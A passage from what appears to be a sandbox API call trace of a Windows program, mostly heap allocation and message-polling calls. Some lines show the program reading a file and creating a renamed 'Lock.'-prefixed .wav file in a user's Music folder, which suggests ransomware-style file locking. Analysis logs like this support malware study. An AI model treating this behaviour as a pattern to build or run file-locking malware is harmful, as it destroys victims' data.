dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac [0205.841] SetFilePointerEx (in: hFile=0x4ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.841] SetFilePointerEx (in: hFile=0x4ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0205.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0205.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0205.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0205.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0205.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0205.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0205.841] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0205.841] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0205.841] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0205.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0205.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0205.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0205.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0205.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0205.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0205.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0205.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0205.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0205.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0205.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0205.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0205.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0205.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74e60 [0205.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0205.842] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0205.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74e60 | out: hHeap=0x2af0000) returned 1 [0205.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0205.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0205.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0205.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0205.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0205.843] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.E6IDgLQGE97MYwh0a.wav" (normalized: "c:\\users\\fd1hvy\\music\\lock.e6idglqge97mywh0a.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0205.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7100 [0205.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0205.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0205.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0205.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0205.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0205.844] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0205.844] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0205.844] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0205.844] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0205.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0205.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0205.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0205.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0205.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0205.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0205.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0205.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0205.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0205.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0205.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0205.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0205.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0205.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0205.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0205.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0205.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0205.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0205.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0205.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e3020 [0205.848] SetFilePointerEx (in: hFile=0x4ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0205.848] ReadFile (in: hFile=0x4ac, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0xce48, lpOverlapped=0x0) returned 1 [0205.850] ReadFile (in: hFile=0x4ac, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0205.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0205.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0205.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xce48) returned 0x2aae878 [0205.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e3020 | out: hHeap=0x2af0000) returned 1 [0205.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0205.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0205.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0205.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0205.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xce48) returned 0x2abb6c8 [0205.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0205.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0205.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0205.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0205.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xce48) returned 0x2aae878 [0205.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0205.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0205.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0205.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0205.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0205.857] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0205.857] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0205.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0205.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b08 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xce48) returned 0x2aae878 [0205.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730a8 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0205.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0205.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0205.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0205.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0205.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0205.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a716e8 [0205.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0205.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0205.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8e8 [0205.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0205.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0205.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0205.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0205.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0205.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xce48) returned 0x2ac8518 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0205.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0205.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0205.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0205.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0205.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0205.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0205.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0205.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0205.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0205.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0205.860] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0205.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0205.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0205.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0205.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0205.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0205.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0205.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0205.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0205.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0205.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0205.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: 